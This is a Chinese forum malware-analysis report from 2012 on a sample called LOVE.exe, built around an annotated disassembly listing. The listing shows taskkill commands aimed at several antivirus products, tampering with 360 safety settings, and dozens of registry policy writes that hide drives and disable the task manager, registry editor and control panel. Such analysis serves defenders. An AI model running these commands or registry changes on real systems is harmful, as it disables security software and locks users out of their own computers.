本帖最后由 Thend 于 2012-8-4 13:42 编辑
基本信息
报告名称:对一恶意程序的分析 作者:Thend
报告更新日期:2012.08.03
样本发现日期:未知
样本类型:恶性病毒
样本文件MD5 校验值: c0d9cec618648730f44f2d5a3bd403db
壳信息:无壳 语言:VC++6.0
可能受到威胁的系统:Windows
|
简介
加入注册表达到自启动,病毒文件同过自己释放一个图标,将图标设为所有应用程序默认图标,并禁用和隐藏了计算机大部分功能。使得计算机根本无法正常工作。
被感染系统及网络症状
隐藏:所有的文件和文件夹,开始菜单中的”运行“、“关机”、“注销”、“搜索”、“登陆”,磁盘驱动器,驱动器,文件夹选项,IE主页选项组,IE文件菜单,IE收藏夹栏,internet选项。
禁用:控制面板,任务管理器,驱动器,打印,IE查看源文件,IE下载功能,右键关联,重启切换到DOS环境,文档菜单,鼠标右键。
关闭所有杀软。所有应用程序图标更改。打开TXT和INF文件方式默认为:查看图片。
文件系统变化
C:\windows\system32\这个目录下生成一个名为Aver.ico的图片,在和主程序同目录下生成del.bat和ddel.bat两个文件,到最后,全部删除。
注册表变化
这部分变化直接在代码分析中了,很多很多,就不一一列出了。主要就有个: HKCU\Software\Microsoft\Windows\CurrentVersion\Run\LOVE.exe SUCCESS "C:\Documents and Settings\Administrator\桌面\LOVE.exe"
创建了个自启动项~
对恶意程序本体的分析:
CB /. 55 push ebp ; 在段首下断点
CC |. 8BEC mov ebp,esp
CE |. 81EC 14000000 sub esp,0x14
D4 |. 68 01030080 push 0x80000301
D9 |. 6A 00 push 0x0
DB |. 68 E8030000 push 0x3E8
E0 |. 68 01000000 push 0x1
E5 |. BB 703E4000 mov ebx,LOVE.00403E70
EA |. E8 64220000 call LOVE.00403353
EF |. 83C4 10 add esp,0x10
F2 |. 68 00000000 push 0x0
F7 |. BB 10354000 mov ebx,LOVE.00403510 ; j
FC |. E8 52220000 call LOVE.00403353
|. 83C4 04 add esp,0x4
|. 8945 FC mov [local.1],eax
|. 68 00000000 push 0x0
C |. BB 30354000 mov ebx,LOVE.00403530 ; j
|. E8 3D220000 call LOVE.00403353 ; 载入病毒名字 LOVE.exe
|. 83C4 04 add esp,0x4
|. 8945 F8 mov [local.2],eax
C |. FF75 F8 push [local.2]
F |. 68 D8994600 push LOVE.004699D8 ; \
|. FF75 FC push [local.1]
|. B9 03000000 mov ecx,0x3
C |. E8 3EFFFFFF call LOVE.0040106F
|> \6A 00 push 0x0
|. 6A 00 push 0x0
B |. 6A 00 push 0x0
D |. 68 04000080 push 0x80000004
|. 6A 00 push 0x0
|. 68 DA994600 push LOVE.004699DA ; C:\windows\system32\Aver.ico
|. 68 01030080 push 0x80000301
E |. 6A 00 push 0x0
|. 68 00000000 push 0x0
|. 68 04000080 push 0x80000004
A |. 6A 00 push 0x0
C |. 8B45 F4 mov eax,[local.3]
F |. 85C0 test eax,eax
|. 75 05 jnz XLOVE.00401188
|. B8 F7994600 mov eax,LOVE.004699F7
|> 50 push eax
|. 68 04000000 push 0x4
E |. B8 01000000 mov eax,0x1
|. BB 10754400 mov ebx,LOVE.00447510
|. E8 C8210000 call LOVE.00403365 ; 在C:\windows\system32\这个目录下生成一个名为Aver.ico的图片
D |. 83C4 34 add esp,0x34
A7 |. 53 push ebx
A8 |. E8 B2210000 call LOVE.0040335F
AD |. 83C4 04 add esp,0x4
B0 |> 68 04000080 push 0x80000004
B5 |. 6A 00 push 0x0
B7 |. 68 DA994600 push LOVE.004699DA ; C:\windows\system32\Aver.ico
BC |. 68 04000080 push 0x80000004
C1 |. 6A 00 push 0x0
C3 |. 68 F8994600 push LOVE.004699F8 ; SOFTWARE\Classes\exefile\DefaultIcon\
C8 |. 68 01030080 push 0x80000301
CD |. 6A 00 push 0x0
CF |. 68 04000000 push 0x4
D4 |. 68 03000000 push 0x3
D9 |. BB 103B4000 mov ebx,LOVE.00403B10
DE |. E8 70210000 call LOVE.00403353 ; 指定应用程序的默认图标是刚刚生成的那个Aver.ico
F0 |. E8 5E210000 call LOVE.00403353 ; 再次载入LOVE.exe
F5 |. 83C4 04 add esp,0x4
F8 |. 8945 FC mov [local.1],eax
FB |. FF75 FC push [local.1]
FE |. 68 1E9A4600 push LOVE.00469A1E ; Software\Microsoft\Windows\CurrentVersion\Run\
|. B9 02000000 mov ecx,0x2
|. E8 62FEFFFF call LOVE.0040106F ; 将LOVE.exe加入开机自启动项
FD |. 83C4 04 add esp,0x4
|. 8945 FC mov [local.1],eax
|. 68 4D9A4600 push LOVE.00469A4D ; \del.bat
|. FF75 FC push [local.1]
B |. B9 02000000 mov ecx,0x2
|. E8 5AFDFFFF call LOVE.0040106F ; 等会儿就会在桌面上生成个del.bat
|. 83C4 08 add esp,0x8
|. 8945 F8 mov [local.2],eax
B |. 8B5D FC mov ebx,[local.1]
E |. 85DB test ebx,ebx
|. 74 09 je XLOVE.0040132B
|. 53 push ebx
|. E8 37200000 call LOVE.0040335F
|. 68 799A4600 push LOVE.00469A79 ; \ddel.bat
|. FF75 FC push [local.1]
A |. B9 02000000 mov ecx,0x2
F |. E8 DBFCFFFF call LOVE.0040106F
|. 83C4 08 add esp,0x8
|. 8945 F8 mov [local.2],eax
A |. 8B5D FC mov ebx,[local.1]
D |. 85DB test ebx,ebx
F |. 74 09 je XLOVE.004013AA
A1 |. 53 push ebx
A2 |. E8 B81F0000 call LOVE.0040335F
A7 |. 83C4 04 add esp,0x4
AA |> 68 05000080 push 0x80000005
AF |. 6A 00 push 0x0
B1 |. 68 839A4600 push LOVE.00469A83
B6 |. 68 04000080 push 0x80000004
BB |. 6A 00 push 0x0
BD |. 8B45 F8 mov eax,[local.2]
C0 |. 85C0 test eax,eax
C2 |. 75 05 jnz XLOVE.004013C9
C4 |. B8 F7994600 mov eax,LOVE.004699F7
C9 |> 50 push eax
CA |. 68 02000000 push 0x2
CF |. BB 30374000 mov ebx,LOVE.00403730
D4 |. E8 7A1F0000 call LOVE.00403353 ;在桌面上生成个ddel.bat
D9 |. 83C4 1C add esp,0x1C
E4 |. E8 761F0000 call LOVE.0040335F
E9 |. 83C4 04 add esp,0x4
EC |> 68 00000000 push 0x0
F1 |. B8 01000000 mov eax,0x1
F6 |. BB 20764400 mov ebx,LOVE.00447620
FB |. E8 651F0000 call LOVE.00403365 ; 任务栏了没有了。。。
|. 83C4 04 add esp,0x4
|. 68 00000000 push 0x0
|. B8 01000000 mov eax,0x1
D |. BB C0754400 mov ebx,LOVE.004475C0
|. E8 4E1F0000 call LOVE.00403365
|. 83C4 04 add esp,0x4
|. 8945 FC mov [local.1],eax
|. 68 799A4600 push LOVE.00469A79 ; \ddel.bat
B |. FF75 FC push [local.1]
E |. B9 02000000 mov ecx,0x2
|. E8 17FCFFFF call LOVE.0040106F
|. 83C4 08 add esp,0x8
B |. 8945 F8 mov [local.2],eax
E |. 8B5D FC mov ebx,[local.1]
|. 85DB test ebx,ebx
|. 74 09 je XLOVE.0040146E
|. 53 push ebx
|. E8 F41E0000 call LOVE.0040335F
B |. 83C4 04 add esp,0x4
E |> 68 01030080 push 0x80000301
|. 6A 00 push 0x0
|. 68 01000000 push 0x1
A |. 68 02000080 push 0x80000002
F |. 6A 00 push 0x0
|. 68 00000000 push 0x0
|. 68 04000080 push 0x80000004
B |. 6A 00 push 0x0
D |. 8B45 F8 mov eax,[local.2]
|. 85C0 test eax,eax
|. 75 05 jnz XLOVE.00401499
|. B8 F7994600 mov eax,LOVE.004699F7
|> 50 push eax
A |. 68 03000000 push 0x3
F |. BB 80334000 mov ebx,LOVE.00403380
A4 |. E8 AA1E0000 call LOVE.00403353 ; 执行ddel.bat
D2 |. E8 7C1E0000 call LOVE.00403353
D7 |. 83C4 10 add esp,0x10
DA |. 68 01030080 push 0x80000301
DF |. 6A 00 push 0x0
E1 |. 68 01000000 push 0x1
E6 |. 68 02000080 push 0x80000002
EB |. 6A 00 push 0x0
ED |. 68 00000000 push 0x0
F2 |. 68 04000080 push 0x80000004
F7 |. 6A 00 push 0x0
F9 |. 68 DA9A4600 push LOVE.00469ADA ; cmd /c taskkill /f /im Aver.exe
FE |. 68 03000000 push 0x3
|. BB 80334000 mov ebx,LOVE.00403380
|. E8 461E0000 call LOVE.00403353 ; 删除那个Aver.ico图标
|. 68 4D9A4600 push LOVE.00469A4D ; \del.bat
A |. FF75 FC push [local.1]
D |. B9 02000000 mov ecx,0x2
|. E8 38FBFFFF call LOVE.0040106F
|. 83C4 08 add esp,0x8
A |. 8945 F8 mov [local.2],eax
D |. 8B5D FC mov ebx,[local.1]
|. 85DB test ebx,ebx
|. 74 09 je XLOVE.0040154D
|. 53 push ebx
|. E8 151E0000 call LOVE.0040335F
A |. 83C4 04 add esp,0x4
D |> 68 01030080 push 0x80000301
|. 6A 00 push 0x0
|. 68 01000000 push 0x1
|. 68 02000080 push 0x80000002
E |. 6A 00 push 0x0
|. 68 00000000 push 0x0
|. 68 04000080 push 0x80000004
A |. 6A 00 push 0x0
C |. 8B45 F8 mov eax,[local.2]
F |. 85C0 test eax,eax
|. 75 05 jnz XLOVE.00401578
|. B8 F7994600 mov eax,LOVE.004699F7
|> 50 push eax
|. 68 03000000 push 0x3
E |. BB 80334000 mov ebx,LOVE.00403380
|. E8 CB1D0000 call LOVE.00403353 ; 执行del.bat 并删除
|. E8 C71D0000 call LOVE.0040335F
|. 83C4 04 add esp,0x4
B |> 68 04000080 push 0x80000004
A0 |. 6A 00 push 0x0
A2 |. 68 FA9A4600 push LOVE.00469AFA ; 2056年1月1日
A7 |. 68 01000000 push 0x1
AC |. BB B0354000 mov ebx,LOVE.004035B0
B1 |. E8 9D1D0000 call LOVE.00403353
B6 |. 83C4 10 add esp,0x10
B9 |. 68 03000080 push 0x80000003
BE |. 52 push edx
BF |. 50 push eax
C0 |. 68 01000000 push 0x1
C5 |. BB C0364000 mov ebx,LOVE.004036C0
CA |. E8 841D0000 call LOVE.00403353 ; 把你系统的时间设置成2056年1月1日
D2 |. 68 01030080 push 0x80000301
D7 |. 6A 00 push 0x0
D9 |. 68 01000000 push 0x1
DE |. 68 02000080 push 0x80000002
E3 |. 6A 00 push 0x0
E5 |. 68 00000000 push 0x0
EA |. 68 04000080 push 0x80000004
EF |. 6A 00 push 0x0
F1 |. 68 079B4600 push LOVE.00469B07 ; taskkill /f /im kavsvc.exe
F6 |. 68 03000000 push 0x3
FB |. BB 80334000 mov ebx,LOVE.00403380
|. E8 4E1D0000 call LOVE.00403353 ; 找到并强制终止卡巴
|. 68 01030080 push 0x80000301
D |. 6A 00 push 0x0
F |. 68 01000000 push 0x1
|. 68 02000080 push 0x80000002
|. 6A 00 push 0x0
B |. 68 00000000 push 0x0
|. 68 04000080 push 0x80000004
|. 6A 00 push 0x0
|. 68 229B4600 push LOVE.00469B22 ; taskkill /f /im KVXP.kxp
C |. 68 03000000 push 0x3
|. BB 80334000 mov ebx,LOVE.00403380
|. E8 181D0000 call LOVE.00403353 ; 找到并强制终止江民杀软进程
E |. 68 01030080 push 0x80000301
|. 6A 00 push 0x0
|. 68 01000000 push 0x1
A |. 68 02000080 push 0x80000002
F |. 6A 00 push 0x0
|. 68 00000000 push 0x0
|. 68 04000080 push 0x80000004
B |. 6A 00 push 0x0
D |. 68 3B9B4600 push LOVE.00469B3B ; taskkill /f /im Rav.exe
|. 68 03000000 push 0x3
|. BB 80334000 mov ebx,LOVE.00403380
C |. E8 E21C0000 call LOVE.00403353 ; 关闭瑞星
|. 68 01030080 push 0x80000301
|. 6A 00 push 0x0
B |. 68 01000000 push 0x1
|. 68 02000080 push 0x80000002
|. 6A 00 push 0x0
|. 68 00000000 push 0x0
C |. 68 04000080 push 0x80000004
|. 6A 00 push 0x0
|. 68 539B4600 push LOVE.00469B53 ; taskkill /f /im Ravmon.exe
|. 68 03000000 push 0x3
D |. BB 80334000 mov ebx,LOVE.00403380
A2 |. E8 AC1C0000 call LOVE.00403353 ; 关闭瑞星的这个监视程序
AA |. 68 01030080 push 0x80000301
AF |. 6A 00 push 0x0
B1 |. 68 01000000 push 0x1
B6 |. 68 02000080 push 0x80000002
BB |. 6A 00 push 0x0
BD |. 68 00000000 push 0x0
C2 |. 68 04000080 push 0x80000004
C7 |. 6A 00 push 0x0
C9 |. 68 6E9B4600 push LOVE.00469B6E ; taskkill /f /im Mcshield.exe
CE |. 68 03000000 push 0x3
D3 |. BB 80334000 mov ebx,LOVE.00403380
D8 |. E8 761C0000 call LOVE.00403353 ; 关闭McAfee VirusScan核心进程
E0 |. 68 01030080 push 0x80000301
E5 |. 6A 00 push 0x0
E7 |. 68 01000000 push 0x1
EC |. 68 02000080 push 0x80000002
F1 |. 6A 00 push 0x0
F3 |. 68 00000000 push 0x0
F8 |. 68 04000080 push 0x80000004
FD |. 6A 00 push 0x0
FF |. 68 8B9B4600 push LOVE.00469B8B ; taskkill /f /im VsTskMgr.exe
|. 68 03000000 push 0x3
|. BB 80334000 mov ebx,LOVE.00403380
E |. E8 401C0000 call LOVE.00403353 ; 关闭McAfee VirusScan的一个组件
|. 68 01030080 push 0x80000301
B |. 6A 00 push 0x0
D |. 68 00000000 push 0x0
|. 68 04000080 push 0x80000004
|. 6A 00 push 0x0
|. 68 A89B4600 push LOVE.00469BA8 ; SOFTWARE\360Safe\safemon\ExecAccess
E |. 68 01030080 push 0x80000301
|. 6A 00 push 0x0
|. 68 04000000 push 0x4
A |. 68 03000000 push 0x3
F |. BB 103B4000 mov ebx,LOVE.00403B10
|. E8 0A1C0000 call LOVE.00403353
|. 83C4 28 add esp,0x28
C |. 68 01030080 push 0x80000301
|. 6A 00 push 0x0
|. 68 00000000 push 0x0
|. 68 04000080 push 0x80000004
D |. 6A 00 push 0x0
F |. 68 CC9B4600 push LOVE.00469BCC ; SOFTWARE\360Safe\safemon\MonAccess
|. 68 01030080 push 0x80000301
|. 6A 00 push 0x0
B |. 68 04000000 push 0x4
|. 68 03000000 push 0x3
|. BB 103B4000 mov ebx,LOVE.00403B10
A |. E8 D41B0000 call LOVE.00403353
F |. 83C4 28 add esp,0x28
|. 68 01030080 push 0x80000301
|. 6A 00 push 0x0
|. 68 00000000 push 0x0
E |. 68 04000080 push 0x80000004
|. 6A 00 push 0x0
|. 68 EF9B4600 push LOVE.00469BEF ; SOFTWARE\360Safe\safemon\SiteAccess
A |. 68 01030080 push 0x80000301
F |. 6A 00 push 0x0
A1 |. 68 04000000 push 0x4
A6 |. 68 03000000 push 0x3
AB |. BB 103B4000 mov ebx,LOVE.00403B10
B0 |. E8 9E1B0000 call LOVE.00403353
B5 |. 83C4 28 add esp,0x28
B8 |. 68 01030080 push 0x80000301
BD |. 6A 00 push 0x0
BF |. 68 00000000 push 0x0
C4 |. 68 04000080 push 0x80000004
C9 |. 6A 00 push 0x0
CB |. 68 139C4600 push LOVE.00469C13 ; SOFTWARE\360Safe\safemon\UDiskAccess
D0 |. 68 01030080 push 0x80000301
D5 |. 6A 00 push 0x0
D7 |. 68 04000000 push 0x4
DC |. 68 03000000 push 0x3
E1 |. BB 103B4000 mov ebx,LOVE.00403B10
E6 |. E8 681B0000 call LOVE.00403353
EB |. 83C4 28 add esp,0x28
EE |. 68 01030080 push 0x80000301
F3 |. 6A 00 push 0x0
F5 |. 68 01000000 push 0x1
FA |. 68 02000080 push 0x80000002
FF |. 6A 00 push 0x0
|. 68 00000000 push 0x0
|. 68 04000080 push 0x80000004
B |. 6A 00 push 0x0
D |. 68 389C4600 push LOVE.00469C38 ; taskkill /f /im 360tray.exe
|. 68 03000000 push 0x3
|. BB 80334000 mov ebx,LOVE.00403380
C |. E8 321B0000 call LOVE.00403353 ;反正就是把360所有的关闭掉
|. 68 04000080 push 0x80000004
|. 6A 00 push 0x0
B |. 68 549C4600 push LOVE.00469C54 ; jpegfile
|. 68 04000080 push 0x80000004
|. 6A 00 push 0x0
|. 68 5D9C4600 push LOVE.00469C5D ; .txt\
C |. 68 01030080 push 0x80000301
|. 6A 00 push 0x0
|. 68 01000000 push 0x1
|. 68 03000000 push 0x3
D |. BB 103B4000 mov ebx,LOVE.00403B10
|. E8 FC1A0000 call LOVE.00403353
|. 83C4 28 add esp,0x28
A |. 68 04000080 push 0x80000004
F |. 6A 00 push 0x0
|. 68 549C4600 push LOVE.00469C54 ; jpegfile
|. 68 04000080 push 0x80000004
B |. 6A 00 push 0x0
D |. 68 639C4600 push LOVE.00469C63 ; .inf\
|. 68 01030080 push 0x80000301
|. 6A 00 push 0x0
|. 68 01000000 push 0x1
E |. 68 03000000 push 0x3
|. BB 103B4000 mov ebx,LOVE.00403B10
|. E8 C61A0000 call LOVE.00403353 ; 设置:所有的TXT文件和inf文件打开方式都默认为图片查看
|. 68 01030080 push 0x80000301
|. 6A 00 push 0x0
|. 68 00000000 push 0x0
C |. 68 04000080 push 0x80000004
A1 |. 6A 00 push 0x0
A3 |. 68 699C4600 push LOVE.00469C69 ; SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\CheckedValue
A8 |. 68 01030080 push 0x80000301
AD |. 6A 00 push 0x0
AF |. 68 04000000 push 0x4
B4 |. 68 03000000 push 0x3
B9 |. BB 103B4000 mov ebx,LOVE.00403B10
BE |. E8 901A0000 call LOVE.00403353 ; 隐藏文件和文件夹
C6 |. 68 01030080 push 0x80000301
CB |. 6A 00 push 0x0
CD |. 68 00000000 push 0x0
D2 |. 68 04000080 push 0x80000004
D7 |. 6A 00 push 0x0
D9 |. 68 C89C4600 push LOVE.00469CC8 ; Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr
DE |. 68 01030080 push 0x80000301
E3 |. 6A 00 push 0x0
E5 |. 68 03000000 push 0x3
EA |. 68 03000000 push 0x3
EF |. BB 103B4000 mov ebx,LOVE.00403B10
F4 |. E8 5A1A0000 call LOVE.00403353 ; 禁用任务管理器
FC |. 68 01030080 push 0x80000301
|. 6A 00 push 0x0
|. 68 01000000 push 0x1
|. 68 04000080 push 0x80000004
D |. 6A 00 push 0x0
F |. 68 119D4600 push LOVE.00469D11 ; Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoControlPanel
|. 68 01030080 push 0x80000301
|. 6A 00 push 0x0
B |. 68 03000000 push 0x3
|. 68 03000000 push 0x3
|. BB 103B4000 mov ebx,LOVE.00403B10
A |. E8 241A0000 call LOVE.00403353 ; 禁用控制面板
|. 68 01030080 push 0x80000301
|. 6A 00 push 0x0
|. 68 01000000 push 0x1
E |. 68 04000080 push 0x80000004
|. 6A 00 push 0x0
|. 68 5C9D4600 push LOVE.00469D5C ; Software\Microsoft\Windows\CurrentVersion\Policies\System\Disableregistrytools
A |. 68 01030080 push 0x80000301
F |. 6A 00 push 0x0
|. 68 03000000 push 0x3
|. 68 03000000 push 0x3
B |. BB 103B4000 mov ebx,LOVE.00403B10
|. E8 EE190000 call LOVE.00403353 ; 禁用注册表
|. 68 01030080 push 0x80000301
D |. 6A 00 push 0x0
F |. 68 01000000 push 0x1
|. 68 04000080 push 0x80000004
|. 6A 00 push 0x0
B |. 68 AB9D4600 push LOVE.00469DAB ; Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun
|. 68 01030080 push 0x80000301
|. 6A 00 push 0x0
|. 68 03000000 push 0x3
C |. 68 03000000 push 0x3
|. BB 103B4000 mov ebx,LOVE.00403B10
|. E8 B8190000 call LOVE.00403353 ; 隐藏开始菜单中的运行。
E |. 68 01030080 push 0x80000301
A3 |. 6A 00 push 0x0
A5 |. 68 01000000 push 0x1
AA |. 68 04000080 push 0x80000004
AF |. 6A 00 push 0x0
B1 |. 68 ED9D4600 push LOVE.00469DED ; SoftWare \Microsoft \Windows \CurrentVersion \Policies\WinOldApp\Disabled
B6 |. 68 01030080 push 0x80000301
BB |. 6A 00 push 0x0
BD |. 68 03000000 push 0x3
C2 |. 68 03000000 push 0x3
C7 |. BB 103B4000 mov ebx,LOVE.00403B10
CC |. E8 82190000 call LOVE.00403353 ; 禁用所有的磁盘驱动器,无论在哪儿都看不到磁盘
D4 |. 68 01060080 push 0x80000601
D9 |. 68 FFFFEF41 push 0x41EFFFFF
DE |. 68 0000E0FF push 0xFFE00000
E3 |. 68 04000080 push 0x80000004
E8 |. 6A 00 push 0x0
EA |. 68 379E4600 push LOVE.00469E37 ; Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDrives
EF |. 68 01030080 push 0x80000301
F4 |. 6A 00 push 0x0
F6 |. 68 03000000 push 0x3
FB |. 68 03000000 push 0x3
A00 |. BB 103B4000 mov ebx,LOVE.00403B10
A05 |. E8 49190000 call LOVE.00403353 ; 隐藏所有驱动器
A0D |. 68 01060080 push 0x80000601
A12 |. 68 FFFFEF41 push 0x41EFFFFF
A17 |. 68 0000E0FF push 0xFFE00000
A1C |. 68 04000080 push 0x80000004
A21 |. 6A 00 push 0x0
A23 |. 68 7C9E4600 push LOVE.00469E7C ; Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewOnDrive
A28 |. 68 01030080 push 0x80000301
A2D |. 6A 00 push 0x0
A2F |. 68 03000000 push 0x3
A34 |. 68 03000000 push 0x3
A39 |. BB 103B4000 mov ebx,LOVE.00403B10
A3E |. E8 10190000 call LOVE.00403353 ; 禁用所有驱动器
A46 |. 68 01030080 push 0x80000301
A4B |. 6A 00 push 0x0
A4D |. 68 01000000 push 0x1
A52 |. 68 04000080 push 0x80000004
A57 |. 6A 00 push 0x0
A59 |. 68 C69E4600 push LOVE.00469EC6 ; Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions
A5E |. 68 01030080 push 0x80000301
A63 |. 6A 00 push 0x0
A65 |. 68 03000000 push 0x3
A6A |. 68 03000000 push 0x3
A6F |. BB 103B4000 mov ebx,LOVE.00403B10
A74 |. E8 DA180000 call LOVE.00403353 ; 禁用文件夹选项
A7C |. 68 01030080 push 0x80000301
A81 |. 6A 00 push 0x0
A83 |. 68 01000000 push 0x1
A88 |. 68 04000080 push 0x80000004
A8D |. 6A 00 push 0x0
A8F |. 68 129F4600 push LOVE.00469F12 ; Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoClose
A94 |. 68 01030080 push 0x80000301
A99 |. 6A 00 push 0x0
A9B |. 68 03000000 push 0x3
AA0 |. 68 03000000 push 0x3
AA5 |. BB 103B4000 mov ebx,LOVE.00403B10
AAA |. E8 A4180000 call LOVE.00403353 ; 隐藏开始菜单中的关机
AB2 |. 68 01030080 push 0x80000301
AB7 |. 6A 00 push 0x0
AB9 |. 68 01000000 push 0x1
ABE |. 68 04000080 push 0x80000004
AC3 |. 6A 00 push 0x0
AC5 |. 68 569F4600 push LOVE.00469F56 ; Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind
ACA |. 68 01030080 push 0x80000301
ACF |. 6A 00 push 0x0
AD1 |. 68 03000000 push 0x3
AD6 |. 68 03000000 push 0x3
ADB |. BB 103B4000 mov ebx,LOVE.00403B10
AE0 |. E8 6E180000 call LOVE.00403353 ; 隐藏开始菜单中的搜索
AE8 |. 68 01030080 push 0x80000301
AED |. 6A 00 push 0x0
AEF |. 68 01000000 push 0x1
AF4 |. 68 04000080 push 0x80000004
AF9 |. 6A 00 push 0x0
AFB |. 68 999F4600 push LOVE.00469F99 ; Software\Policies\Microsoft\Internet Explorer\Control Panel\HomePage
B00 |. 68 01030080 push 0x80000301
B05 |. 6A 00 push 0x0
B07 |. 68 03000000 push 0x3
B0C |. 68 03000000 push 0x3
B11 |. BB 103B4000 mov ebx,LOVE.00403B10
B16 |. E8 38180000 call LOVE.00403353 ; 隐藏IE的主页选项组
B1E |. 68 01030080 push 0x80000301
B23 |. 6A 00 push 0x0
B25 |. 68 01000000 push 0x1
B2A |. 68 04000080 push 0x80000004
B2F |. 6A 00 push 0x0
B31 |. 68 DE9F4600 push LOVE.00469FDE ; Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFileMenu
B36 |. 68 01030080 push 0x80000301
B3B |. 6A 00 push 0x0
B3D |. 68 03000000 push 0x3
B42 |. 68 03000000 push 0x3
B47 |. BB 103B4000 mov ebx,LOVE.00403B10
B4C |. E8 02180000 call LOVE.00403353 ; 隐藏IE文件菜单
B54 |. 68 01030080 push 0x80000301
B59 |. 6A 00 push 0x0
B5B |. 68 01000000 push 0x1
B60 |. 68 04000080 push 0x80000004
B65 |. 6A 00 push 0x0
B67 |. 68 25A04600 push LOVE.0046A025 ; Software\Policies\Microsoft\Internet Explorer\Restrictions\NoFavorites
B6C |. 68 01030080 push 0x80000301
B71 |. 6A 00 push 0x0
B73 |. 68 03000000 push 0x3
B78 |. 68 03000000 push 0x3
B7D |. BB 103B4000 mov ebx,LOVE.00403B10
B82 |. E8 CC170000 call LOVE.00403353 ; 隐藏收藏夹选项
B8A |. 68 01030080 push 0x80000301
B8F |. 6A 00 push 0x0
B91 |. 68 01000000 push 0x1
B96 |. 68 04000080 push 0x80000004
B9B |. 6A 00 push 0x0
B9D |. 68 6CA04600 push LOVE.0046A06C ; Software\Policies\Microsoft\Internet Explorer\Restrictions\NoPrinting
BA2 |. 68 01030080 push 0x80000301
BA7 |. 6A 00 push 0x0
BA9 |. 68 03000000 push 0x3
BAE |. 68 03000000 push 0x3
BB3 |. BB 103B4000 mov ebx,LOVE.00403B10
BB8 |. E8 96170000 call LOVE.00403353 ; 禁用IE的打印功能
BC0 |. 68 01030080 push 0x80000301
BC5 |. 6A 00 push 0x0
BC7 |. 68 01000000 push 0x1
BCC |. 68 04000080 push 0x80000004
BD1 |. 6A 00 push 0x0
BD3 |. 68 B2A04600 push LOVE.0046A0B2 ; Software\Policies\Microsoft\Internet Explorer\Restrictions\NoBrowserOptions
BD8 |. 68 01030080 push 0x80000301
BDD |. 6A 00 push 0x0
BDF |. 68 03000000 push 0x3
BE4 |. 68 03000000 push 0x3
BE9 |. BB 103B4000 mov ebx,LOVE.00403B10
BEE |. E8 60170000 call LOVE.00403353 ; 隐藏INTERTER选项
BF6 |. 68 01030080 push 0x80000301
BFB |. 6A 00 push 0x0
BFD |. 68 01000000 push 0x1
C02 |. 68 04000080 push 0x80000004
C07 |. 6A 00 push 0x0
C09 |. 68 FEA04600 push LOVE.0046A0FE ; Software\Policies\Microsoft\Internet Explorer\Restrictions\NoViewSource
C0E |. 68 01030080 push 0x80000301
C13 |. 6A 00 push 0x0
C15 |. 68 03000000 push 0x3
C1A |. 68 03000000 push 0x3
C1F |. BB 103B4000 mov ebx,LOVE.00403B10
C24 |. E8 2A170000 call LOVE.00403353 ; 禁止IE查看源文件
C2C |. 68 01030080 push 0x80000301
C31 |. 6A 00 push 0x0
C33 |. 68 03000000 push 0x3
C38 |. 68 04000080 push 0x80000004
C3D |. 6A 00 push 0x0
C3F |. 68 46A14600 push LOVE.0046A146 ; Software\Microsoft\Windows\CurrentVersion\Interner Settings\Zones\3\1803
C44 |. 68 01030080 push 0x80000301
C49 |. 6A 00 push 0x0
C4B |. 68 03000000 push 0x3
C50 |. 68 03000000 push 0x3
C55 |. BB 103B4000 mov ebx,LOVE.00403B10
C5A |. E8 F4160000 call LOVE.00403353 ; 禁用IE下载功能
C62 |. 68 01030080 push 0x80000301
C67 |. 6A 00 push 0x0
C69 |. 68 01000000 push 0x1
C6E |. 68 04000080 push 0x80000004
C73 |. 6A 00 push 0x0
C75 |. 68 8FA14600 push LOVE.0046A18F ; Software\Policies\Microsoft\Internet Explorer\Restrictions\NoBrowserContextMenu
C7A |. 68 01030080 push 0x80000301
C7F |. 6A 00 push 0x0
C81 |. 68 03000000 push 0x3
C86 |. 68 03000000 push 0x3
C8B |. BB 103B4000 mov ebx,LOVE.00403B10
C90 |. E8 BE160000 call LOVE.00403353 ; 禁用右键关联
C98 |. 68 01030080 push 0x80000301
C9D |. 6A 00 push 0x0
C9F |. 68 01000000 push 0x1
CA4 |. 68 04000080 push 0x80000004
CA9 |. 6A 00 push 0x0
CAB |. 68 DFA14600 push LOVE.0046A1DF ; Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRealMode
CB0 |. 68 01030080 push 0x80000301
CB5 |. 6A 00 push 0x0
CB7 |. 68 03000000 push 0x3
CBC |. 68 03000000 push 0x3
CC1 |. BB 103B4000 mov ebx,LOVE.00403B10
CC6 |. E8 88160000 call LOVE.00403353 ; 禁止重启切换到DOS环境下
CCE |. 68 01030080 push 0x80000301
CD3 |. 6A 00 push 0x0
CD5 |. 68 01000000 push 0x1
CDA |. 68 04000080 push 0x80000004
CDF |. 6A 00 push 0x0
CE1 |. 68 26A24600 push LOVE.0046A226 ; Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoLogOff
CE6 |. 68 01030080 push 0x80000301
CEB |. 6A 00 push 0x0
CED |. 68 03000000 push 0x3
CF2 |. 68 03000000 push 0x3
CF7 |. BB 103B4000 mov ebx,LOVE.00403B10
CFC |. E8 52160000 call LOVE.00403353 ; 禁止注销计算机
D04 |. 68 01030080 push 0x80000301
D09 |. 6A 00 push 0x0
D0B |. 68 01000000 push 0x1
D10 |. 68 04000080 push 0x80000004
D15 |. 6A 00 push 0x0
D17 |. 68 6BA24600 push LOVE.0046A26B ; Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRecentDocsMenu
D1C |. 68 01030080 push 0x80000301
D21 |. 6A 00 push 0x0
D23 |. 68 03000000 push 0x3
D28 |. 68 03000000 push 0x3
D2D |. BB 103B4000 mov ebx,LOVE.00403B10
D32 |. E8 1C160000 call LOVE.00403353 ; 禁用文档菜单
其中还有很多操作,但是都是一样的,这里就不一一列出来了,基本上都是很简单的一些注册表操作。运行到下面,基本上就结束了: C9 /. 55 push ebp
CA |. 8BEC mov ebp,esp
CC |. 68 04000080 push 0x80000004
D1 |. 6A 00 push 0x0
